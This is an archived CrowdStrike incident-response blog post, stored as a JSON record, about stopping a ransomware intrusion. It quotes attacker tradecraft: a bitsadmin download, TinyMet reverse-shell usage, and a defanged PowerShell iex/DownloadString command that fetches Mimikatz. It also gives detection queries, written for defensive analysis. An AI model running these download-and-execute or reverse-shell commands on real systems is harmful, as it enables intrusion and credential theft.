{
	"id": "daf387a7-519e-4d09-aa02-1d318a208c31",
	"created_at": "2026-04-06T00:17:53.260412Z",
	"updated_at": "2026-04-10T03:21:09.558877Z",
	"deleted_at": null,
	"sha1_hash": "f646d5be3ea88d8750cce1d1e14eb8aca3b89d68",
	"title": "Response When Minutes Matter: Rising Up Against Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1342751,
	"plain_text": "Response When Minutes Matter: Rising Up Against Ransomware\r\nBy Falcon Complete Team\r\nArchived: 2026-04-05 12:36:09 UTC\r\nThis blog describes a recent incident that highlights the CrowdStrike Falcon® Complete™ team’s ability to act as\r\nan extension of a customer’s security team to quickly detect, triage and contain an active attacker before it was\r\nable to achieve its goal. In this example, we outline how a fast, coordinated response by the Falcon Complete,\r\nFalcon OverWatch™ threat hunting and CrowdStrike® Intelligence teams — over a holiday weekend — stopped\r\na big game hunting ransomware actor in its tracks. This response methodology protects our customers 24/7/365\r\nand delivers on the CrowdStrike promise: We stop breaches.\r\nThe Initial Detection\r\nThe CrowdStrike Falcon®® agent identified that “a process attempted to download a file using bitsadmin in an\r\nunusual way,” which caused a “High” alert within the Falcon UI and the Falcon Complete team’s queue.\r\nFigure 1. Process tree for the initial detection The high severity quickly caught the attention of Falcon Complete,\r\nand after expanding the process tree within the Falcon UI, analysts’ suspicions of ongoing nefarious activities\r\nwere raised. The team quickly identified initial reconnaissance commands, followed immediately by a pivot into a\r\n“living off the land” technique of abusing bitsadmin.exe to download an unknown file. (“Living off the land” is a\r\nwell-known technique where threat actors use built-in features to slip under the radar of less sophisticated\r\nendpoint detection and response (EDR) solutions.) Spawning from wmiprvse.exe, which suggests WMI lateral\r\nmovement, bitsadmin — an inbuilt Windows Administrator tool commonly used by threat actors to download files\r\n— was used to download the unknown file “cmk.ex” from the a remote address via port 81 to\r\nC:\\Users\\Public\\Pictures\\cmk.ex. This file was then renamed, using the Windows tool “move,” to a Windows-recognized executable extension file “cmk.exe.” The use of port 81 and a non-standard executable extension,\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 1 of 6\n\nwhich was then locally renamed, was assessed to be an attempt to avoid detection by potential network intrusion\ndetection systems.\nOnce renamed, the file was executed with the command line “cmk.exe 1 80.” Utilizing unique\nstrings appearing within the binary obtained via using the utility strings, Falcon Complete determined that the file\nwas a custom-compiled, packed and heavily obfuscated version of the tool TinyMet.\nTinyMet\nUsage: tinymet.exe LHOST LPORT\nAvailable transports are as follows:\n 0: reverse_tcp\n 1: reverse_http\n 2: reverse_https\n 3: bind_tcp\nFigure 2. Usage for TinyMet.exe, from the GitHub repo At this stage, the Falcon Complete team was confident\nthat this activity was not benign and began a quick and calculated remediative effort to remove the threat without\ncausing an unnecessary negative business impact. Falcon Complete began by killing and remediating cmk.exe to\nensure its added capabilities were not available to the threat actor.\nHowever, shortly after the removal of the cmk.exe file, Falcon blocked and alerted on a WMI lateral movement\nattempting to spawn and run a PowerShell downgrade attack followed by an attempted download and execution of\nthe post-exploitation tool Mimikatz.\niex((new-object net.webclient).DownloadString('hxxps\u003c://\u003eraw\u003c.\u003egithubusercontent\u003c.\u003ecom/PowerShellMafia/PowerSpl\nFigure 3. Command line for the Mimikatz detection At this point, Falcon Complete assessed that the risk posed to\nthe host and the environment was too high to allow attempts to continue while investigating. Therefore, the\npreventive step of network containment was taken against the host. This denied all access to the host, other than\nvia the Falcon platform, and gave Falcon Complete time to safely delve into the detection data.\nFrom here, Falcon Complete re-pivoted the investigation into the extensive investigation toolset within the Falcon\nUI — including User Search and Endpoint Activity Monitoring (EAM) — to gain further context and determine\nthe origin of the activity.\nFinding Patient Zero\nAs identified, WMI was being used to laterally move from another host, and Falcon Complete now began to dig to\nfind Patient Zero and any files or commands that had been run on the host.\nThe lightweight CrowdStrike Falcon® agent provides a rich source of EDR telemetry that provides critical\ninsights into the behavior of each endpoint. Our EAM application gives the Falcon Complete team and Falcon\ncustomers the ability to search this execution data in real time to quickly investigate and scope the extent of\ncompromise for an incident.\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\nPage 2 of 6\n\nThis telemetry, combined with pre-defined reporting in Falcon’s Investigate app, enabled the Falcon Complete\r\nteam to identify compromised user accounts and the original source of the threat actor’s activity. During the\r\ninvestigation, Falcon OverWatch simultaneously pushed a detection to the Falcon Complete team for review — it\r\ninvolved additional lateral movement attempts from an IP that did not have the Falcon agent installed, leveraging\r\nPSExec to run reconnaissance commands on further hosts, and write a binary with the name “info.zip.”\r\nFigure 4. Process tree for the Falcon OverWatch alert With the attacker methodology flagged by Falcon\r\nOverWatch, the Falcon Complete team was able to use specialized EAM searches to track the activity to a specific\r\nsystem on the network.\r\nevent_simpleName=ProcessRollup2 (FileName=psexecsvc.exe OR FileName=wsmprovhost.exe)\r\n| stats values(FileName) AS Parent, values(CommandLine) AS ParentCmd by ComputerName TargetProcessId_decimal\r\n| join aid TargetProcessId_decimal\r\n \u003c search ProcessRollup2\r\n | stats values(FileName) AS FileName,\r\nvalues(CommandLine) AS ChildCommand by ComputerName ParentProcessId_decimal\r\n | rename FilePath AS ChildPath\r\n| eval TargetProcessId_decimal=ParentProcessId_decimal \u003e\r\nFigure 5. Falcon EAM Query for all PSExec lateral movement telemetry data Armed with the origin system, it\r\nwas possible to use Host Search in the Investigate app to identify the most recently logged-on user, which allowed\r\na further pivot to User Search to identify where the compromised account had been used to log in to other systems\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 3 of 6\n\nvia legitimate Windows means. Due to the telemetry available from the Falcon sensor in the environment, the\r\n“living off the land” attempt did not work.\r\nevent_simpleName=UserLogon (LogonType_decimal=\"3\" OR LogonType_decimal=\"10\") | eval timestamp=(timestamp / 1000\r\n| convert timeformat=\"%FT%H:%M:%S.%3N UTC\" ctime(timestamp) AS timestamp_readable | stats count AS Count, min(ti\r\n| sort timestamp_readable\r\nFigure 6. Falcon EAM Query for all RDP logon telemetry data/span\u003e Because logon events are closely tracked\r\nby the Falcon agent, and we know that using tools such as PSExec and RDP (Remote Desktop Protocol) generate\r\nType 3 or Type 10 logon events within the data collected by Falcon (and Windows event logs), we can use this\r\nknowledge and Falcon’s event data to more quickly obtain valuable information normally tracked in Windows\r\nlogs. In this case, we can obtain the logon times, source network address and username that are being used by the\r\nthreat actor and use this information to inform actions taken by the Falcon Complete team, as well as those\r\nundertaken by the customer. Using the above query, the Falcon Complete team was able to build a complete\r\npicture of the compromised account within minutes and identify Patient Zero — the compromised system and user\r\nthat was the source of the RDP logons and PSExec commands. Falcon Complete noted during the investigation\r\nthat during nearly all of the lateral movement attempts by the threat actor, regardless of execution method, the\r\nparent process was WMIPrvSE.exe — the windows binary responsible for executing remote WMI calls.\r\nA further query could be used to confirm our suspicions and ensure that Patient Zero was successfully identified.\r\nevent_simpleName=WmiCreateProcess | eval timestamp=(timestamp / 1000)\r\n| convert timeformat=\"%FT%H:%M:%S.%3N UTC\" ctime(timestamp) AS ExecutionTime\r\n| table ExecutionTime, ComputerName, RemoteAddressIP4, LocalAddressIP4, CommandLine\r\n| sort ExecutionTime\r\nFigure 7. Falcon EAM Query, which provides all remote WMI executions and sorts by time in an environment\r\nArmed with data confirming Patient Zero via several “living off the land” techniques leveraged by the threat actor,\r\nFalcon Complete was able to confidently assess the source of the intrusion, begin to implement policies that\r\nwould slow the actor, and inform the customer of actions to be taken to fully remove the threat from the\r\nenvironment, such as installing the Falcon agent on the source host so that network containment and remediation\r\ncould begin at the source. Because Falcon Complete sees a wide range of adversarial threats daily, we can develop\r\nqueries such as those shown to enable fast triage and response to detections in situations where every minute\r\nmatters.\r\nThe Remediation\r\nIn this case, the threat was an active hands-on-keyboard attack, and after non-business-disruptive remediation\r\nproved unsuccessful, Falcon Complete opted to network-contain hosts that the threat actor had access to. This led\r\nto five hosts being contained in the environment. Once contained, all artifacts, including executables and\r\npersistence, were remediated from the hosts.\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 4 of 6\n\nTo ensure full remediation, actions that needed to be taken outside of the scope of the Falcon sensor were\r\nescalated to the customer:\r\nDisabling of compromised account\r\nBlocking threat actor infrastructure at perimeter firewalls\r\nInstallation of the Falcon sensor onto Patient Zero\r\nDue to this activity being both over a holiday weekend and after-hours for the customer, we did not receive\r\nimmediate responses from our escalations. As a result, and to help contain the threat actor, Falcon Complete\r\nimplemented a custom indicator of attack (IOA) that would detect, in real time, any connections from the\r\nunmanaged Patient Zero device or the command and control (C2) identified. This would allow immediate\r\ninvestigation and response before the threat actor could take any meaningful action on the newly accessed host. To\r\nfurther this custom IOA, all bespoke tools used by the threat actor were blocklisted in the Falcon UI.\r\nFigure 8. Falcon detection showing blocked C2 connection Once we received replies from the customer shortly\r\nthereafter, the customer was able to quickly install the Falcon sensor onto the unmanaged Patient Zero due to the\r\nFalcon platform’s lightweight, single agent architecture. Immediately, Falcon Complete began to use the Falcon\r\nReal Time Response (RTR) functionality to triage the host. With the intelligence and TTPs gained from the\r\ninvestigation, Falcon Complete was quickly able to pivot into the known locations the threat actor stored tools and\r\ndata. Falcon Complete located a number of reconnaissance files, including lists of 50 internal IP addresses as well\r\nas bespoke scripts to build the toolset observed on the hosts previously remediated. Again, Falcon Complete\r\nremediated the malicious tools and threat-actor-gathered intelligence on this host. Once Patient Zero was\r\nremediated and the compromised account disabled, this instance of the threat could be considered successfully\r\nneutralized.\r\nCrowdStrike Intelligence Analysis\r\nPer the standard procedure of the Falcon Complete team, we provided the CrowdStrike Intelligence team with\r\nsamples of the cmk.exe and info.zip files, as well as the network indicators identified during the investigation.\r\nOf interest to our investigation was that the Intelligence team identified that the staging IP address was also\r\nhosting an additional file on port 81 named 2.zip, which contained a binary identified as a known ransomware\r\nvariant.\r\nWhile the CrowdStrike Intelligence team does not specifically attribute this attack to any named adversaries or\r\nany specific ransomware-as-a-service (RaaS) affiliate, the quick actions from the Falcon Complete team prevented\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 5 of 6\n\nthis customer from almost certainly becoming a victim of a big game hunting ransomware operation.\r\nSummary\r\nFalcon Complete initially identified an executable download of TinyMet and the attempted execution of a TCP\r\nreverse shell within our customer’s environment. Using Process Explorer as well as EAM, we were able to\r\nidentify multiple attempts at lateral movement from a host that did not have the Falcon sensor installed.\r\nFalcon Complete then used the Host Search functionality to identify the compromised user credentials before\r\npivoting to User Search to identify where the compromised user account was being used for lateral movement.\r\nThis allowed us to place those hosts into network containment, as well as block lateral movement attempts from\r\nthe host without the Falcon sensor. We were able to block the threat actor’s malicious executables and stop them in\r\ntheir tracks. These quick actions protected our customer and almost certainly prevented them from falling victim\r\nto a ransom attempt. All of this malicious activity and the Falcon Complete team’s response and remediation\r\nhappened over a holiday weekend, showing the importance of 24/7/365 security monitoring in a corporate\r\nenvironment and the power of partnering with CrowdStrike and Falcon Complete. The Falcon Complete team’s\r\nresponse methodology provides these kinds of results for our customers at all hours of every day to stop breaches.\r\nWe look forward to sharing more case studies and providing some best practices for quick and effective incident\r\nresponse.\r\nAdditional Resources\r\nLearn more by visiting the Falcon Complete product webpage.\r\nRead a white paper: CrowdStrike Falcon® Complete: Instant Cybersecurity Maturity for Organizations of\r\nAll Sizes.\r\nTest CrowdStrike next-gen AV for yourself: Start your free trial of Falcon Prevent™.\r\nSource: https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nhttps://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
	],
	"report_names": [
		"how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack"
	],
	"threat_actors": [],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775791269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.pdf",
		"text": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.txt",
		"img": "https://archive.orkl.eu/f646d5be3ea88d8750cce1d1e14eb8aca3b89d68.jpg"
	}
}